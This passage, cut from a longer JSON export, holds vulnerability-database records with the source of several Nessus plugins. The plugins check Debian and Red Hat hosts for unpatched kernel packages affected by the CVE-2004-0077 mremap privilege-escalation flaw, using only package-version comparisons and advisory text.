script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.4.18\", reference:\"2.4.18-14.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-386\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-586tsc\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-686\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-686-smp\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-generic\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-k6\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", 
prefix:\"kernel-headers-2.4.18-1-k7\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-1-smp\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.18-bf2.4\", reference:\"2.4.18-5woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-386\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-586tsc\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-686\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-686-smp\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-generic\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-k6\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-k7\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-1-smp\", reference:\"2.4.18-14\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-bf2.4\", reference:\"2.4.18-5woody7\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-newpmac\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-powerpc\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.18-powerpc-smp\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.4.18-powerpc\", reference:\"2.4.18-1woody4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-386\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-586tsc\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", 
prefix:\"kernel-pcmcia-modules-2.4.18-1-686\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-686-smp\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-pcmcia-modules-2.4.18-1-k7\", reference:\"2.4.18-12.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.4.18\", reference:\"2.4.18-14.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:57:49", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-453-1 : linux-kernel-2.2.20-i386+m68k+powerpc - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-i386", "p-cpe:/a:debian:debian_linux:kernel-patch-2.2.20-powerpc", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mac", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-bvme6000", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-reiserfs-i386", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.20", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme147", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-atari", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-amiga", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme16x"], "id": "DEBIAN_DSA-453.NASL", "href": "https://www.tenable.com/plugins/nessus/15290", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-453. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15290);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"453\");\n\n script_name(english:\"Debian DSA-453-1 : linux-kernel-2.2.20-i386+m68k+powerpc - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-453\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in the\nfollowing versions and architectures :\n\n package arch version \n kernel-source-2.2.20 source 2.2.20-5woody3 \n kernel-image-2.2.20-i386 i386 2.2.20-5woody5 \n kernel-image-2.2.20-reiserfs-i386 i386 2.2.20-4woody1 \n kernel-image-2.2.20-amiga m68k 2.20-4 \n kernel-image-2.2.20-atari m68k 2.2.20-3 \n kernel-image-2.2.20-bvme6000 m68k 2.2.20-3 \n kernel-image-2.2.20-mac m68k 2.2.20-3 \n kernel-image-2.2.20-mvme147 m68k 2.2.20-3 \n kernel-image-2.2.20-mvme16x m68k 2.2.20-3 \n kernel-patch-2.2.20-powerpc powerpc 2.2.20-3woody1 \n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-amiga\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-atari\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-bvme6000\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme147\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-mvme16x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.20-reiserfs-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.2.20-powerpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.20\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-compact\", 
reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-idepci\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-reiserfs\", reference:\"2.2.20-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-amiga\", reference:\"2.2.20-4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-atari\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-bvme6000\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-chrp\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-compact\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-idepci\", reference:\"2.2.20-5woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-mac\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-mvme147\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-mvme16x\", reference:\"2.2.20-3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-pmac\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-prep\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-reiserfs\", reference:\"2.2.20-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.2.20-powerpc\", reference:\"2.2.20-3woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse 
audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:57:59", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-456-1 : linux-kernel-2.2.19-arm - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-netwinder", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-patch-2.2.19-arm", "p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-riscpc", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.19"], "id": "DEBIAN_DSA-456.NASL", "href": "https://www.tenable.com/plugins/nessus/15293", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-456. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15293);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"456\");\n\n script_name(english:\"Debian DSA-456-1 : linux-kernel-2.2.19-arm - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. 
However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-456\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 20040303 of 2.2 kernel images for the arm architecture.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-netwinder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.2.19-riscpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.2.19-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.19\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.19\", reference:\"2.2.19.1-4woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.19\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.19-netwinder\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.19-riscpc\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.2.19-arm\", reference:\"20040303\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.19\", reference:\"2.2.19.1-4woody1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:02:51", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. 
We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-514-1 : kernel-image-sparc-2.2 - failing function and TLB flush", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-source-2.2.20", "p-cpe:/a:debian:debian_linux:kernel-image-sparc-2.2"], "id": "DEBIAN_DSA-514.NASL", "href": "https://www.tenable.com/plugins/nessus/15351", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-514. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15351);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"514\");\n\n script_name(english:\"Debian DSA-514-1 : kernel-image-sparc-2.2 - failing function and TLB flush\");\n script_summary(english:\"Checks dpkg output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. 
Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-514\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 9woody1 of Linux 2.2 kernel images for the sparc architecture\nand in version 2.2.20-5woody3 of Linux 2.2.20 source.\n\nThis problem has been fixed for other architectures already.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-sparc-2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-source-2.2.20\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-doc-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.2.20-sparc\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4cdm\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4dm-smp\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4u\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.2.20-sun4u-smp\", reference:\"9woody1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.2.20\", reference:\"2.2.20-5woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:05:17", "description": "Updated kernel packages that fix a security vulnerability that may\nallow local users to gain root privileges are now available. 
These\npackages also resolve other minor issues.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nPaul Starzetz discovered a flaw in return value checking in mremap()\nin the Linux kernel versions 2.4.24 and previous that may allow a\nlocal attacker to gain root privileges. No exploit is currently\navailable; however this issue is exploitable. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0077 to this issue.\n\nAll users are advised to upgrade to these errata packages, which\ncontain backported security patches that correct these issues.\n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this\nissue.\n\nFor the IBM S/390 and IBM eServer zSeries architectures, the upstream\nversion of the s390utils package (which fixes a bug in the zipl\nbootloader) is also included.", "edition": 28, "published": "2004-07-06T00:00:00", "title": "RHEL 3 : kernel (RHSA-2004:066)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:kernel-BOOT", "p-cpe:/a:redhat:enterprise_linux:s390utils", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-smp", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-source", "p-cpe:/a:redhat:enterprise_linux:kernel-smp-unsupported", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2004-066.NASL", "href": "https://www.tenable.com/plugins/nessus/12468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:066. 
